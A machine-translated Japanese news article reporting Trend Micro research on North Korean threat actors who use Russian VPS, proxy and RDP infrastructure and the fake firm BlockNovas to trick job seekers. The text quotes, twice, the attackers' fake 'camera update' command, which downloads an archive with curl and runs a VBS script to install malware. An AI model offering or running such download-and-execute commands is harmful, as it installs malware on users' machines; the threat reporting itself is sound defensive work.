日本語版
最新ニュース
科学&テクノロジー

RDPを備えたロシアのVPSサーバー、プロキシサーバーは北朝鮮のサイバー犯罪運用を燃料と燃やします

北朝鮮のサイバー犯罪事業は、ロシアのインフラストラクチャを含む精巧なスキームを通じて、国内ネットワークに割り当てられた限られた1,024のIPアドレスを超えて大幅に拡大しています。 最近の調査結果によると、主にカサンとカバロフスクの国境の町にある5つのロシアのIP範囲は、世界中のテクノロジーの専門家からの暗号通貨の財布と機密情報を対象とした洗練された攻撃を促進するために活用されています。 北朝鮮ロシアの国境からわずか1マイルに位置し、韓国ロシアの友情橋を介して接続されているカサンは、これらの事業の戦略的な場所として機能します。 サイバー犯罪者は、商用VPNサービス、プロキシサーバー、およびリモートデスクトッププロトコル(RDP)アクセスを備えた多数の仮想プライベートサーバー(VPS)を使用した多層匿名化ネットワークを確立しています。 このインフラストラクチャにより、北朝鮮の脅威俳優は、スカイプ、テレグラム、ディスコード、スラックなどのジョブリクルートメントプラットフォーム、暗号通貨サービス、および通信アプリケーションに接続しながら、起源を隠すことができます。 トレンドマイクロ研究者 識別されます Void Dokkaebi(有名なChollimaとも呼ばれます)として知られる脅威アクターは、BlockNovasのような架空の企業を通じて広範なソーシャルエンジニアリングキャンペーンを実施しており、これは洗練されたオンラインプレゼンスを持つブロックチェーンテクノロジー企業としての地位を示しています。 BlockNovasは、ウクライナ、米国、ドイツのIT専門家をターゲットにしており、不正な就職面接を行い、被害者にインタビュープロセスに必要なソフトウェアに変装したマルウェアをダウンロードして実行するよう促しました。 これらの操作をサポートするインフラストラクチャは、KhasanとKhabarovskの2つの組織に割り当てられた特定のロシアのIP範囲にまでさかのぼります。 これらのIP範囲には、80.237.84.0/24(2024年9月に作成)、80.237.87.0/24(2024年12月に作成)、188.43.136.0/24(2017年9月に作成)、およびKPOST-NetやSkyFreight-Netなどのネットワーク名に登録された他のいくつかは含まれます。 候補者がBlockNovasの自動インタビュープロセスに従事したとき、カメラが必要と主張するメッセージを受け取りました ソフトウェアアップデート、コマンドを実行する手順があります: - curl - k -o "%TEMP%nvidiaupdate.zip" https://easydriver.cloud/nvidia-rc.update/Ci2e6ZNwwytp0FMWsiu2CpPkVlZCkhou && powershell -Command "Expand-Archive -Force Path '%TEMP%nvidiaupdate.zip' -DestinationPath '%TEMP%nvidiadrive'" && wscript "%TEMP%nvidiadriveupdate.vbs" このコマンドは、Mac SystemsのFrostyferretとして知られるマルウェアまたはWindowsのGolangghostをダウンロードおよび実行し、これらのバリアントとBeavertailの両方をサポートするコマンドアンドコントロールサーバーに接続します マルウェア。 BlockNovas:北朝鮮のソーシャルエンジニアリングのケーススタディ BlockNovas…

RDPを備えたロシアのVPSサーバー、プロキシサーバーは北朝鮮のサイバー犯罪運用を燃料と燃やします

1745770408
2025-04-25 09:09:00

北朝鮮のサイバー犯罪事業は、ロシアのインフラストラクチャを含む精巧なスキームを通じて、国内ネットワークに割り当てられた限られた1,024のIPアドレスを超えて大幅に拡大しています。

最近の調査結果によると、主にカサンとカバロフスクの国境の町にある5つのロシアのIP範囲は、世界中のテクノロジーの専門家からの暗号通貨の財布と機密情報を対象とした洗練された攻撃を促進するために活用されています。

北朝鮮ロシアの国境からわずか1マイルに位置し、韓国ロシアの友情橋を介して接続されているカサンは、これらの事業の戦略的な場所として機能します。

サイバー犯罪者は、商用VPNサービス、プロキシサーバー、およびリモートデスクトッププロトコル(RDP)アクセスを備えた多数の仮想プライベートサーバー(VPS)を使用した多層匿名化ネットワークを確立しています。

このインフラストラクチャにより、北朝鮮の脅威俳優は、スカイプ、テレグラム、ディスコード、スラックなどのジョブリクルートメントプラットフォーム、暗号通貨サービス、および通信アプリケーションに接続しながら、起源を隠すことができます。

トレンドマイクロ研究者 識別されます Void Dokkaebi(有名なChollimaとも呼ばれます)として知られる脅威アクターは、BlockNovasのような架空の企業を通じて広範なソーシャルエンジニアリングキャンペーンを実施しており、これは洗練されたオンラインプレゼンスを持つブロックチェーンテクノロジー企業としての地位を示しています。

BlockNovasは、ウクライナ、米国、ドイツのIT専門家をターゲットにしており、不正な就職面接を行い、被害者にインタビュープロセスに必要なソフトウェアに変装したマルウェアをダウンロードして実行するよう促しました。

これらの操作をサポートするインフラストラクチャは、KhasanとKhabarovskの2つの組織に割り当てられた特定のロシアのIP範囲にまでさかのぼります。

これらのIP範囲には、80.237.84.0/24(2024年9月に作成)、80.237.87.0/24(2024年12月に作成)、188.43.136.0/24(2017年9月に作成)、およびKPOST-NetやSkyFreight-Netなどのネットワーク名に登録された他のいくつかは含まれます。

候補者がBlockNovasの自動インタビュープロセスに従事したとき、カメラが必要と主張するメッセージを受け取りました ソフトウェアアップデート、コマンドを実行する手順があります: –

curl - k -o "%TEMP%nvidiaupdate.zip" https://easydriver.cloud/nvidia-rc.update/Ci2e6ZNwwytp0FMWsiu2CpPkVlZCkhou && powershell -Command "Expand-Archive -Force Path '%TEMP%nvidiaupdate.zip' -DestinationPath '%TEMP%nvidiadrive'" && wscript "%TEMP%nvidiadriveupdate.vbs"

このコマンドは、Mac SystemsのFrostyferretとして知られるマルウェアまたはWindowsのGolangghostをダウンロードおよび実行し、これらのバリアントとBeavertailの両方をサポートするコマンドアンドコントロールサーバーに接続します マルウェア

BlockNovas:北朝鮮のソーシャルエンジニアリングのケーススタディ

BlockNovas Operationは、北朝鮮の脅威俳優が採用した洗練されたソーシャルエンジニアリング戦術を例示しています。

2024年7月に作成されたBlockNovasは、LinkedIn、Upwork、Facebook、X(以前のTwitter)のプロファイルを含む広範なオンラインプレゼンスを維持しました。

LinkedIn(ソース – トレンドマイクロ)でのブロックノバの存在

同社のウェブサイトでは、ソフトウェアの専門家をターゲットにした求人情報を説得するため、ブロックチェーンテクノロジーに焦点を当てたモダンなデザインを特徴としていました。

このグループは、人工知能を活用して、数百人のフォロワーと合法的に見える架空の最高技術責任者を含む、説得力のあるオンラインペルソナを作成しました。

BlockNovasは、2024年12月にウクライナのITプロフェッショナルを特に標的にし、暗号通貨の専門知識を持つ個人に焦点を当てています。

2025年4月23日、FBIは、北朝鮮のサイバー俳優に対する法執行措置の一環として、ブロックノバスドメインを押収しました。

FBIはBlockNovasドメインを押収しました(ソース – トレンドマイクロ)

グループのインフラストラクチャの分析により、Beavertail Malware Command-and-ControlサーバーとHashtopolisなどのパスワードクラッキングツールへの接続が明らかになり、暗号通貨盗難に操作が焦点を当てていることが示されました。

調査官はまた、Beavertail C&C Serverのセットアップと暗号通貨ウォレットのパスワードクラッキングを詳述している非ネイティブ英語のテキストを含む教育ビデオを発見し、北朝鮮のコアを超えた外国の共謀者とのコラボレーションを提案しました。

これらのビデオは、その間に作成されました RDP ロシアのIPアドレスからのセッションは、これらの業務におけるロシアのインフラストラクチャの中心的な役割のさらなる証拠を提供します。

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy

#RDPを備えたロシアのVPSサーバープロキシサーバーは北朝鮮のサイバー犯罪運用を燃料と燃やします

執筆者について: nipponese

Nipponese News編集部は、国内外のニュースを日本語で分かりやすくお届けします。